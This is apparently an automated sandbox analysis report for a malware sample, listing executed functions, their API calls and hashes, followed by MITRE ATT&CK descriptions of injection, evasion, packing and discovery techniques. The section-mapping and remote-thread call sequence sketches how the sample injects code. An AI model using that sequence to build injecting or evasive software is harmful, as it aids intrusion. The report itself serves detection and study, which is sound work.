NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02DE003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02DE024D

Strings

cess, xrefs: 02DE018D
kernel32.dll, xrefs: 02DE008F, 02DE0095

Memory Dump Source

Source File: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2de0000_wsbgrgh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 18aa183273b5f6f9607d16aaeab441365940d8a99b46a2781a1a081a15357831
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D0526874A002299FDB64DF58C984BACBBB1BF09305F1480D9E94EAB351DB70AE85CF14

Function 00415BD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B19CE8), ref: 00415CAF
GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 00415CEC
VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 00415D0B

Strings

, xrefs: 00415C15

Memory Dump Source

Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
Instruction ID: bc4e3c19969ebc9a4e99d85580481d2fdd23850efab95505bf2beb8bb76e5d7b
Opcode Fuzzy Hash: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
Instruction Fuzzy Hash: DF3155149487C0CAE301CB78F8547823FA2EB25744F44847CD589873A5EFBA1524D7EE

Function 02E4FB5A Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E4FB82
Module32First.KERNEL32(00000000,00000224), ref: 02E4FBA2

Memory Dump Source

Source File: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e4c000_wsbgrgh.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: f816d9af40980749b5b9f2afb984de8aa61e2f1250a07f3400d999461a6ef8f1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 53F0F6325407146FD7203BF4BCACF6E72ECAF4AA28F105168E643918C0CF70E8054A61

Function 02DE0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02DE0223,?,?), ref: 02DE0E19
SetErrorMode.KERNELBASE(00000000,?,?,02DE0223,?,?), ref: 02DE0E1E

Memory Dump Source

Source File: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2de0000_wsbgrgh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4750618981923a01f89273afc3a4e037d58370ce1d0f83cbcc8ad4e0bd2a7547
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: AFD0123114512877DB003A94DC09BCD7B1CDF05B67F008021FB0DE9180C7B0994086E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02E4F819 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E4F86A

Memory Dump Source

Source File: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e4c000_wsbgrgh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d0017b937d08ab791c00d636ac3392bd75ec71a8a7316360447011fb0bd3eb2f
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 51112879A40208EFDB01DF98C985E98BBF5EF08751F1580A4FA489B361D771EA90DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415BA0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B19CE4,0041624B), ref: 00415BA8

Memory Dump Source

Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
Instruction ID: fe12b94824aaeca9f7b044923cb86b1d99ba87f8ef2d7c3be42197bf5250df23
Opcode Fuzzy Hash: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
Instruction Fuzzy Hash: D5B092B09846409BD7008BB0A814B513AA4F308742F404461F60982180CA2014208F14

Non-executed Functions

Function 00415DA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415DD1
WritePrivateProfileStringA.KERNEL32(00418370,0041834C,00418324,00418314), ref: 00415DF5
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415DFD
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415E3D
GetComputerNameW.KERNEL32(?,?), ref: 00415E51
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415E5F
OpenJobObjectA.KERNEL32(00000000,00000000,00418398), ref: 00415E6E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415E7F

Strings

-, xrefs: 00415E8C

Memory Dump Source

Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
Instruction ID: abc8187be86aaec5557a924f26b2f4a332d91e2d9627e3e72ea80ce62a19c939
Opcode Fuzzy Hash: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
Instruction Fuzzy Hash: D721FD31E84344EBD7209FA4DC85BDA7B74EB4CB11F1080AAF64DAA1C0CAB416C48B59

Function 00415EC0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415EF4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415F0F
HeapDestroy.KERNEL32(00000000), ref: 00415F2E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415F36

Memory Dump Source

Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
Instruction ID: c20d9250ee03896141b2a136b5260c7d7263afdf9e87988df33f4b26659f440c
Opcode Fuzzy Hash: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
Instruction Fuzzy Hash: 7D01F270A84604DBD710EBA4ED49BDA7BB8EB0C706F804077F60A97281DA3419948B5A

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
